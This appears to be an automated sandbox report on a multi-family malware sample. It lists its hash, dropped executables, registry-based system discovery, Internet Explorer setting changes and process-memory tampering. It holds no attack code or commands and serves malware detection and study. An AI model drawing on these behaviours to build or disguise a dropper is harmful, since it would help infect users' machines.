Malware Analysis Report

2025-08-10 19:52

Sample ID: 250703-gmda2afl9y
Target: 2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop
SHA256: 3d50860483f03ced72f9166831c5f4326aae3acfdd0cc1d278b4e6b3211e9f7e
Tags: discovery
Score: 7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 7/10

SHA256: 3d50860483f03ced72f9166831c5f4326aae3acfdd0cc1d278b4e6b3211e9f7e

Threat Level: Shows suspicious behavior

The file 2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop was found to show suspicious behavior.

Malicious Activity Summary

discovery

Executes dropped EXE

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Gathers network information

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2025-07-03 05:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2025-07-03 05:54

Reported: 2025-07-03 05:57

Platform: win10v2004-20250619-en

Max time kernel: 149s

Max time network: 140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\qljdbvtnlg.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_qljdbvtnlg.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\qkicavsnlf.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_qkicavsnlf.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\kfdxvpnifa.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_kfdxvpnifa.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\causmkecxu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_causmkecxu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\fzxrpkhczu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_fzxrpkhczu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\wrpjhbzurm.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_wrpjhbzurm.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\rmjecwuomg.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_rmjecwuomg.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\igbytrljdb.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_igbytrljdb.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\oigaytqljd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_oigaytqljd.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\igaysqlida.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_igaysqlida.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\faysqkicav.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_faysqkicav.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\causmkfcxu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\i_causmkfcxu.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A
N/A N/A C:\Temp\kfcxupnhfz.exe N/A
N/A N/A C:\temp\CreateProcess.exe N/A

System Location Discovery: System Language Discovery

Tags: discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_eywqoigbyt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\qkicavsnlf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_qkicavsnlf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\kfdxvpnifa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_causmkecxu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\fzxrpkhczu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_wrpjhbzurm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_rmjecwuomg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\qljdbvtnlg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\igbytrljdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\oigaytqljd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_oigaytqljd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_causmkfcxu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_ecwupmhfzx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_bztrljebwu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_igbytrljdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_igaysqlida.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\ywqojgbztr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\eywqoigbyt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\sqlidavtnl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_fzxrpkhczu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\wrpjhbzurm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\faysqkicav.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_faysqkicav.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_kfcxupnhfz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\yvqoigaytq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\temp\CreateProcess.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\causmkecxu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\rmjecwuomg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\causmkfcxu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\kfcxupnhfz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\ecwupmhfzx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_ywqojgbztr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\gaysqlidbvtnlfdy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\pnhfaxsqki.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_pnhfaxsqki.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_qljdbvtnlg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_kfdxvpnifa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\igaysqlida.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_yvqoigaytq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_sqlidavtnl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\bztrljebwu.exe N/A

Modifies Internet Explorer settings

Tags: adware, spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000001ae698d4dc529193fb739ab8579f60fa89deabab4fad6ddd6edeb4f45ce795ed000000000e80000000020000200000002e8ee7a93441166102f27d01a6a7837e7d1296bad16575d9d6b71516b2879f742000000007cbd71f6faab943dd1d2e622521a82759c6c966dd6a94ab8f8addb25db88ef4400000009cd7db07d183aa9b3e4cac3103d21df5e463a728d2abc94814c237dfa751475dea760d43639dc9512a7add064e275d65ad713e3280b7ff7d9640c472c3790186 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\User Preferences C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\UpgradeTime = 04e1a46c61e1db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\KnownProvidersUpgradeTime = 04e1a46c61e1db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000002d5f9b32d7ad8579c51ae169a6dc60375a45fb02a867a31606039991b5194a8c000000000e8000000002000020000000cff5908bbb0d5d263fc143d5b81d3f9a3b750b03998948d7dc792cda422e49da100000004f5ed7be25e1a14a723f1fad7efabc3940000000baf41d9eaf9f33413272e4fcfb3ebc202320698ee560753097956d0e9b26d7196de8df76a2a8aa955ce3c4b28ced1df536edb7a80d45743992f5d9bd64779360 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30aa6f17dfebdb01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{4240665B-57D2-11F0-9B6E-C2DCADC1FE9C} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "381482518" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 301b7217dfebdb01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "458287076" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Bing" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\Version = "5" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IENTSS" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\2BB20B33B4171CDAAB6469225AE6A582ED33D7B488 = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000982d4e763a2bc45f97f3ff8192843bb23c58052dfa046135ca5da319caac0cf6000000000e80000000020000200000008c2d350cd3a022671bc1ce2df317819bae5c8ed478b63743175ae4ba10ff50bf10000000201e76672764b644cd70862453ddcd994000000062a78e5998df3a809e6938956f968b19edb66b27b0a370108d5f45ed0a969ebc128049774748dff5b54055bd7e183618b44c8cbd4a0317cde9ab6f42b0ddd44e C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d5000000000200000000001066000000010000200000007c1347e0c0c896f52b4de36f1193825bc56f040fb55b3213222cadaafd52aac9000000000e8000000002000020000000c8623b68226d9233f7e8207f8c5f580880b08140ddad5c75bf2b165ef73c0cf6200000005bb4925abccb4b758a12d434b5d0e0f6ed363482f1ac340c8e599e21c3611b0040000000e3c6c29f2d77c0a6cac0cc8e04326734e2308c8ab897945a7115fa00dedb1efca733dc353012f7858a69fcc91d03b36b0e7dca0d3e89e20880aaf50d0192657f C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = [value not captured] C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\User Preferences\3DB9590C4C4C26C4CCBDD94ECAD790359708C3267B = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ff599b21372dfe42a0f1bce4fa9421d500000000020000000000106600000001000020000000a137aec44824d0334289144516214a0a1ad2ce35f8393056bdc68bfca86a6823000000000e80000000020000200000006748049c4895b5f563b3ebb2cbe1ede46385bb9831465a8b554241cc7035c32a500000001db58fa578243a002515ca100cc0f97d02a6349642df5dade3304ba277e7bfebb4afd4fc7f7e5d0a687ad9539d4fd1b91b6edfff0a2c68c99ed893d6123112ea552b3393224949380f400afe0018fa554000000001b1fb60c275d032dfc8ee8d4f351ff4646a733fc85d7305f0baf8ac7b8b69056490ff2227a9a768157572616a340c7f81d03d143eba97d63de3633a02609b3b C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURL = "http://www.bing.com/favicon.ico" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "385700650" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
